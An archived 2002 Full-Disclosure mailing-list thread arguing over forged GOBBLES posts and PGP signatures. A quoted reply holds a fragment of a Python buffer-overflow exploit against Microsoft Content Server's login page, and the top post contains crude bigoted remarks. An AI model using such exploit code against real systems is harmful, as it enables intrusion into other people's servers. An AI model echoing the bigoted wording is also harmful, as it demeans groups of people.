lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: contact at bia-security.com (Anthony LaMantia)
Subject: ALERT! ALERT! Confessions of a turkey
	ALERT! ALERT! ;p;p;p;p;p;p;p

lol, well bugtraq is no diffrent the dallas proxy was hacked a month or
so back and all of the e-mail address it pwds: to published lol

besides dont you know this is the first front the anti-white-war started
by gayh1tler.. there is a lot of shit going down.. this list isn't goona
be the worst part


-Anthony LaMantia
www.bia-security.com
On Wed, 2002-08-14 at 15:17, security-protocols@...hmail.com wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Maybe noone has noticed this but,
> 
> this person is sending as 'gobbles@...h.com' and not the real 'gobbles@...hmail.com'.
> 
> See below:
> 
> @hush.com email addresses
> 27/7/02 - Is yourname @hushmail.com already taken? Sign up now for a hush.com email address.
> 
> - - -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> You supposed to be turkey friend turkey crew wanttobe yet you question
> 
> show respect to turkey
> 
> On 14 Aug 2002 17:06:11 -0400, full-disclosure@...ts.netsys.com wrote:
> >At least you got the key id correct that time. It's not a valid
> >signature, but at least it produces one less error message.
> >
> >-dave
> >
> >ObExploit:
> >
> >#fragment of my exploit for MS Content Server
> >#the full exploit can be found at https://immunitysec.com/members/ #but
> >if you're not a member, this might save you some time writing your
> >#exploit.
> >
> >#returns the sploitstring
> >    def makesploit(self):
> >        header=""
> >        body=""
> >
> >        body+="NR_DOMAIN=WinNT%3A%2F%2F"
> >        #1 alignment byte so we are word aligned with the return addr
> >        attack=""
> >        attack+="A"
> >        attack+="\x41\xb9"*4000
> >        #unicode shellcode!!
> >        attack=stroverwrite(attack,unicodeloop,1)
> >        print "length of overflow = "+str(len(attack))
> >        attack=urllib.quote(attack)
> >        #print attack
> >
> >        body+=attack
> >
> >body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS
> >WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest
> >Login.asp"
> >
> >
> >
> >        header+="POST /NR/System/Access/ManualLoginSubmit.asp
> >HTTP/1.1\r\n"
> >        header+="Host: "+self.host+"\r\n"
> >        header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows
> >NT; Bob)\r\n"
> >        header+="Accept:
> >text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla
> >in
> >;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q
> >=0.1\r\n"
> >        header+="Connection: keep-alive\r\n"
> >        header+="Content-Type: application/x-www-form-urlencoded\r\n"
> >        header+="Content-Length: "+str(len(body))+"\r\n"
> >        header+="\r\n"
> >
> >        return header+body
> >
> >
> >
> >#this stuff happens.
> >if __name__ == '__main__':
> >
> >    print "Running Microsoft Content Server exploit v 0.1"
> >    app = mscsexploit()
> >    if len(sys.argv) < 2:
> >        print "Usage: mycontent.py target [port] [ssl=0]"
> >        sys.exit()
> >
> >    app.setHost(sys.argv[1])
> >    if len(sys.argv) > 2:
> >        app.setPort(int(sys.argv[2]))
> >
> >    if len(sys.argv) > 3:
> >        app.setSSL(1)
> >
> >    app.run()
> >
> >
> >On Wed, 2002-08-14 at 17:00, gobbles@...h.com wrote:
> >>
> >> -----BEGIN PGP SIGNED MESSAGE-----
> >> Hash: SHA1
> >>
> >> or if you like
> >>
> >> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave@...unitysec.com>
> >> wrote:
> >> >On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
> >> >> Gobbles,
> >> >>
> >> >> On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles@...h.com wrote:
> >> >> > GOBBLES just want to be cool whitehat like everyone else.  Time
> >> >> > for
> >new
> >> > leaf time for six figure salary stock option naked breasted
> >> > assistant.
> >> >>
> >> >> Word to that my man! ;)
> >> >>
> >> >> peace,
> >> >> core
> >> >
> >> >Your message was signed, but the "GOBBLES" message was not and
> >> >therefore just a forgery, most likely.
> >> >
> >> >BTW:
> >> >http://www.immunitysec.com/vulnerabilities/
> >> >They arn't advisories, but if you need something to show to your
> >> >boss about why you disconnected your Exchange/SQL server from the
> >> >Internet, it's a good start.
> >> >
> >> >Dave Aitel
> >> >Immunity, Inc
> >> >
> >> >
> >>
> >> -----BEGIN PGP SIGNATURE-----
> >> Version: Hush 2.1
> >> Note: This signature can be verified at https://www.hushtools.com
> >>
> >> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
> >> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
> >> =xfu0
> >> -----END PGP SIGNATURE-----
> >>
> >>
> >> Communicate in total privacy.
> >> Get your free encrypted email at https://www.hushmail.com/?l=2
> >>
> >> Looking for a good deal on a domain name?
> >> http://www.hush.com/partners/of
> >fers.cgi?id=domainpeople
> >>
> >>
> >
> 
> - - -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
> 
> wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
> 9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
> =9eW6
> - - -----END PGP SIGNATURE-----
> 
> 
> Communicate in total privacy.
> Get your free encrypted email at https://www.hushmail.com/?l=2
> 
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
> 
> wmcEARECACcFAj1a1V8gHHNlY3VyaXR5LXByb3RvY29sc0BodXNobWFpbC5jb20ACgkQ
> NAoGe68ymd16tACdGhj0H0rmHla8zAQMPX/Vh5Wya8QAn3FK7K4C1+h8RqTLjIBPKU3M
> d18c
> =gcJ+
> -----END PGP SIGNATURE-----
> 
> 
> Communicate in total privacy.
> Get your free encrypted email at https://www.hushmail.com/?l=2
> 
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ